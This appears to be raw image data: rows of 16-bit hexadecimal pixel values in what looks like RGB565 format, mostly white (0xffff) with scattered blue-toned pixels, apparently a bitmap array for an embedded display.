0xffff, 0xf7df, 0xf7ff, 0xfffd, 0xfffd, 0xd7ff, 0x1396, 0x1c17, 0xc7ff, 0xfffe, 0xffbd, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xf7df, 0xfffe, 0xfffe, 0xdfdf, 0x12b2, 0x1356, 0x02d4, 0x0ab4, 0x0a94, 0x0ab5, 0x0294, 0x02f6, 0x1317, 0x1293, 0xd7bf, 0xfffd, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xfffd, 0xffdd, 0xffbf, 0xffbf, 0xffff, 0xfffe, 0xffdd, 0xe7ff, 0x6dbb, 0x1394, 0x75ba, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffff, 0xd79f, 0x3332, 0x09ee, 0x9e1d, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xcf1f, 0x11ca, 0x9599, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xa5ba, 0x9d56, 0xefff, 0x3355, 0x1317, 0x0b77, 0x0355, 0x0b58, 0x0b1b, 0x0b57, 0x0b57, 0x0b57, 0x0b57, 0x0b58, 0x0b58, 0x0b58, 0x0b58, 0x0b58, 0x1359, 0x0b38, 0x1315, 0x22f1, 0xdfff, 0x9db9, 0xb65c, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0x96be, 0x0bf4, 0x54b5, 0xe7ff, 0xf7ff, 0xffbe, 0xffff, 0x7cd9, 0x018d, 0xd79f, 0xf7ff, 0xd79f, 0x0230, 0x0359, 0x037a, 0x1356, 0x0a0d, 0x328d, 0xf7de, 0xd7bf, 0x09ee, 0x6cfa, 0xe7ff, 0x32f1, 0x1ad1, 0xbfff, 0xcfff, 0x1ab4, 0x0273, 0x65be, 0xcfff, 0x755c, 0x0a72, 0x0b16, 0xdf7d, 0xffde, 0xff9e, 0xf7ff, 0xa77f, 0x1bd3, 0x3c14, 0xe7ff, 0xffff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffe, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0x9e9d, 0x0af4, 0x657d, 0xe7ff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xdfdf, 0x0271, 0x0b78, 0x0b59, 0x1378, 0x1356, 0x0b36, 0x1359, 0x0b5b, 0x033a, 0x0294, 0xc75f, 0xfffd, 0xff9e, 0xff3d, 0xffdf, 0xf7dd, 0xfffd, 0xfffd, 0xff9e, 0xffbf, 0xffde, 0xfffd, 0xffbd, 0xf7ff, 0xb77f, 0x1bd3, 0x3c55, 0xdfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffde, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xffdd, 0xfffe, 0xfffe, 0xefbf, 0x2a91, 0x0ab5, 0x0b57, 0x0271, 0x95da, 0xf7ff, 0xf7fe, 0xf7fe, 0xf7ff, 0xffdf, 0xffff, 0xffde, 0xffff, 0xffbf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xf7ff, 0x5c36, 0x0a4f, 0x3331, 0xe7ff, 0xffff, 0xffff, 0xfffd, 0xf7ff, 0xffff, 0xffdd, 0xfffd, 0x9d77, 0x220f, 0x19ee, 0x5370, 0xdfff, 0x3357, 0x02d8, 0x0b76, 0x0b94, 0x0376, 0x035c, 0x0b58, 0x0b58, 0x1338, 0x1338, 0x1338, 0x0378, 0x0378, 0x0378, 0x0b58, 0x0b59, 0x0b59, 0x0b36, 0x1b12, 0xd7ff, 0x8d5a, 0x116c, 0x21cb, 0x84b6, 0xe79f, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xf7ff, 0x54f8, 0x03d5, 0xae7b, 0xefff, 0xf7ff, 0xffdf, 0xffff, 0x7d39, 0x01cd, 0xbf3f, 0xf7ff, 0xdf9f, 0x1ab3, 0x0319, 0x0317, 0x0a50, 0x4b72, 0xc6bf, 0xf7ff, 0xcf7f, 0x09ae, 0x7cda, 0xe7ff, 0x32d1, 0x1ad3, 0x553d, 0x6ddf, 0x12f4, 0x1317, 0x2bfb, 0x6dff, 0x3437, 0x12f4, 0x1358, 0xe75d, 0xffff, 0xffdf, 0xf7ff, 0xdfff, 0x4cb6, 0x1311, 0xbf9f, 0xefff, 0xffde, 0xffde, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xfffe, 0xffff, 0xffbf, 0xfffe, 0xe7ff, 0x6538, 0x1b35, 0xa6df, 0xefff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0x8518, 0x0af4, 0x0337, 0x0b99, 0x0b17, 0x1337, 0x1358, 0x0b39, 0x033a, 0x0b9b, 0x0294, 0x6cd6, 0xfffe, 0xffdf, 0xffdf, 0xffff, 0xefff, 0xefff, 0xf7ff, 0xffbf, 0xffbf, 0xffde, 0xfffd, 0xffdd, 0xffff, 0xd7ff, 0x3413, 0x2392, 0xcfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xf7fe, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xd77f, 0x1a2d, 0x22f4, 0x0ad5, 0x0b16, 0x0b14, 0x0a70, 0x961c, 0xefff, 0xf7fe, 0xffde, 0xf7be, 0xffde, 0xffde, 0xffdf, 0xffbf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffbf, 0xffbf, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffc, 0xfffd, 0xefff, 0x3b74, 0x1314, 0x12b0, 0xe7ff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xffdd, 0xffdd, 0xcf3e, 0x7d3a, 0x32d0, 0x5b91, 0xe7ff, 0x2b15, 0x0b38, 0x0377, 0x0b74, 0x0b77, 0x035a, 0x0b58, 0x0b38, 0x1339, 0x1318, 0x1337, 0x0377, 0x0378, 0x0b58, 0x1338, 0x0b38, 0x0377, 0x0b76, 0x0270, 0xd7bf, 0x84f9, 0x322f, 0x9559, 0xc6fe, 0xefff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffde, 0xffff, 0xefff, 0x2bf4, 0x0c59, 0xdf7e, 0xefff, 0xf7ff, 0xffde, 0xffff, 0xb6be, 0x0a2f, 0x6cf7, 0xf7ff, 0xe79f, 0x11ed, 0x0a93, 0x4395, 0xc69d, 0xffff, 0xffff, 0xdfff, 0x74f8, 0x09ad, 0xae5f, 0xd7bf, 0x11ee, 0x1a92, 0x0a70, 0x0a6f, 0x1290, 0x1a92, 0x0a72, 0x0250, 0x0af2, 0x1b96, 0x0b17, 0xef5c, 0xffff, 0xffff, 0xffff, 0xf7ff, 0x861b, 0x1374, 0x761e, 0xe7ff, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffff,
0xffff, 0xffff, 0xffff, 0xf7df, 0xdfff, 0x4477, 0x2375, 0xbf7f, 0xf7ff, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffff, 0xa5fa, 0x0231, 0x0b79, 0x0b99, 0x1337, 0x1358, 0x1379, 0x0358, 0x0b78, 0x1338, 0x0232, 0x8dba, 0xeffe, 0xf7df, 0xefdf, 0xae7e, 0x6d18, 0x6d38, 0x95db, 0xefdf, 0xf7df, 0xf7ff, 0xfffe, 0xffdd, 0xf7ff, 0xdfff, 0x6517, 0x2332, 0xaf3f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7fe, 0xf7fe, 0xffff, 0xfffe, 0xffdf, 0xf7ff, 0xcf3e, 0x1af2, 0x1b14, 0x0a70, 0x85dc, 0xbf5f, 0x1ab1, 0x12f4, 0x0271, 0x961b, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffdd, 0xfffd, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffd, 0xfffd, 0xe7df, 0x1291, 0x1335, 0x0a90, 0xc73f, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xefff, 0xdfff, 0xe7df, 0xef7f, 0xf7df, 0x4c16, 0x0315, 0x0399, 0x0b58, 0x1377, 0x1336, 0x0b57, 0x0b58, 0x0b59, 0x1358, 0x0b57, 0x0b57, 0x0b58, 0x1338, 0x1b17, 0x1337, 0x0b77, 0x0b54, 0x3393, 0xefff, 0xd6bd, 0xe77f, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffde, 0xffff, 0xd79f, 0x1b53, 0x24fc, 0xefdf, 0xefff, 0xf7ff, 0xffde, 0xffff, 0xefff, 0x2b31, 0x1a6e, 0xc6fe, 0xefbf, 0x3aac, 0x9dfb, 0xf7ff, 0xffbf, 0xffbe, 0xf7ff, 0xa73f, 0x22d0, 0x32ce, 0xdfff, 0x74d8, 0x6497, 0xcfbf, 0xcf9f, 0xd77f, 0xdfbf, 0xd77f, 0xcf7f, 0xcfff, 0x4c97, 0x0292, 0x1358, 0xef5c, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xb73f, 0x13d6, 0x3cfa, 0xdfff, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffff,
0xffff, 0xffff, 0xffff, 0xf7ff, 0xd7ff, 0x3416, 0x2bf6, 0xcfff, 0xffff, 0xffde, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffd, 0xfffd, 0xf7ff, 0x43b7, 0x0af7, 0x1358, 0x0b17, 0x0b38, 0x0b99, 0x0376, 0x0b96, 0x1af5, 0x4355, 0xe7ff, 0xe7fd, 0xcf7f, 0x3353, 0x0251, 0x0af2, 0x026f, 0x0a4f, 0x2ab2, 0xc6ff, 0xefff, 0xf7fe, 0xfffe, 0xf7ff, 0xe7ff, 0x7d99, 0x2312, 0x8e9f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xfffd, 0xf7fe, 0xefff, 0xffff, 0xfffe, 0xfffe, 0xcf7f, 0x1ab2, 0x0337, 0x0292, 0x8579, 0xf7ff, 0xffff, 0xc6ff, 0x12b1, 0x1315, 0x0250, 0x95bb, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xefff, 0xeffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7dd, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xdfbf, 0x0252, 0x0b58, 0x0272, 0xb6bf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7df, 0xf7de, 0xf7fe, 0xf7fd, 0xffdd, 0xff9e, 0xffff, 0x7db9, 0x02f2, 0x0399, 0x035a, 0x1337, 0x1b34, 0x1357, 0x0b58, 0x0378, 0x0b78, 0x0b57, 0x0b58, 0x0b38, 0x1b37, 0x1b36, 0x1357, 0x0337, 0x02b4, 0x5c55, 0xffff, 0xff9d, 0xffdf, 0xf7de, 0xfffe, 0xfffd, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xb6dd, 0x1332, 0x457e, 0xf7de, 0xf7ff, 0xffff, 0xffbe, 0xfffe, 0xf7ff, 0xbf5f, 0x01ac, 0x2ab0, 0xbeff, 0xe7ff, 0xefff, 0xf7ff, 0xffff, 0xf7ff, 0xcf9f, 0x12f3, 0x01cb, 0xae9c, 0xd7df, 0x1a6e, 0xa65d, 0xefff, 0xffff, 0xffde, 0xffde, 0xfffe, 0xfffd, 0xf7ff, 0x7d19, 0x1293, 0x1ad6, 0xef7d, 0xefff, 0xe7ff, 0xfffe, 0xfffe, 0xcf9f, 0x1c17, 0x2479, 0xd7ff, 0xfffe, 0xfffe, 0xefff, 0xf7ff, 0xfffe, 0xfffe, 0xffff,
0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xcfff, 0x2bf5, 0x3497, 0xcfff, 0xf7ff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xae3e, 0x0a51, 0x1b78, 0x0b38, 0x0b59, 0x0378, 0x0376, 0x1b96, 0x1a30, 0xadbc, 0xf7ff, 0xe7fe, 0x1a71, 0x1315, 0x0b78, 0x1356, 0x2333, 0x5478, 0x0a30, 0x1a91, 0xdf9f, 0xffff, 0xf7bd, 0xf7ff, 0xefff, 0x961a, 0x1b11, 0x765f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xe7df, 0x124f, 0x1af7, 0x0253, 0x85bc, 0xf7ff, 0xfffe, 0xff9d, 0xffff, 0xcf9f, 0x0a6f, 0x12d4, 0x01f0, 0x9ddc, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xa5da, 0x8d79, 0x95da, 0x95da, 0x8d9a, 0x95fd, 0x7d39, 0xb69c, 0xf7fe, 0xfffd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xbeff, 0x0273, 0x0b9a, 0x0294, 0x961e, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffde, 0xfffd, 0xfffc, 0xfffe, 0xffff, 0xdf9f, 0xc7df, 0x02f0, 0x0378, 0x035b, 0x0b38, 0x1b55, 0x1357, 0x0b58, 0x0358, 0x0378, 0x0b78, 0x0b78, 0x0b78, 0x0b56, 0x0b56, 0x1358, 0x135a, 0x0a74, 0xa63c, 0xfffe, 0xfffd, 0xf7ff, 0xffbd, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0x9e3a, 0x1b11, 0x661f, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdd, 0xfffe, 0xefff, 0x95fb, 0x0a0f, 0x01b0, 0x53f8, 0x95de, 0xae9f, 0x9e1d, 0x53f6, 0x01cf, 0x122e, 0x9dfc, 0xe7ff, 0x53f5, 0x09ed, 0xae9d, 0xffff, 0xffdd, 0xfffe, 0xffff, 0xfffe, 0xfffd, 0xf7ff, 0x7cf9, 0x1232, 0x22f8, 0xe75d, 0xefff, 0xefff, 0xfffe, 0xffdd, 0xd7ff, 0x2478, 0x1c16, 0xd7df, 0xfffe, 0xfffe, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xfffe, 0xf7ff, 0xcfff, 0x23d4, 0x34b6, 0xcfff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0x3b51, 0x0af4, 0x0b58, 0x0b59, 0x0b78, 0x0b57, 0x12f4, 0x32f1, 0xffff, 0xf7ff, 0x9558, 0x0a54, 0x02f8, 0x0b9a, 0x0252, 0xaf1f, 0xd7ff, 0x657e, 0x0a72, 0x6476, 0xffff, 0xffde, 0xf7fe, 0xefff, 0x9e3b, 0x1b31, 0x6e5f, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffbf, 0xffff, 0xbede, 0x228f, 0x22f4, 0x0a53, 0x8dbb, 0xefff, 0xffde, 0xffbe, 0xffff, 0xffff, 0xf7ff, 0xcf5f, 0x22b1, 0x1af5, 0x0a31, 0x857a, 0xf7ff, 0xffdf, 0xf7be, 0xffff, 0x22d2, 0x0a71, 0x0a91, 0x1290, 0x0a4f, 0x12b2, 0x0230, 0x6496, 0xf7ff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xae5c, 0x0292, 0x0379, 0x02b5, 0x8d9c, 0xffff, 0xffde, 0xf7ff, 0xffff, 0xffbe, 0xffdf, 0xffff, 0xffde, 0xffff, 0xf7df, 0x9ddd, 0x22b0, 0xd7ff, 0x7579, 0x0251, 0x0b59, 0x0b7a, 0x0b37, 0x1b38, 0x1337, 0x0b57, 0x0b58, 0x0b78, 0x0398, 0x0397, 0x0377, 0x0b78, 0x0b18, 0x0275, 0x64bb, 0xe7ff, 0x42ed, 0x8d57, 0xe7ff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xe7ff, 0x8df9, 0x1af1, 0x7e9f, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xf7ff, 0xe7ff, 0xc7df, 0x5459, 0x1211, 0x11cf, 0x09ed, 0x0a2e, 0x0a2f, 0x4bf8, 0xdf7d, 0xefff, 0x5bf8, 0x1253, 0x12b2, 0x963c, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xf7df, 0xffff, 0xefff, 0x7d1a, 0x0a53, 0x12d9, 0xe77d, 0xe7ff, 0xefff, 0xfffd, 0xffbd, 0xd7ff, 0x2c98, 0x1bf6, 0xd7bf, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff,
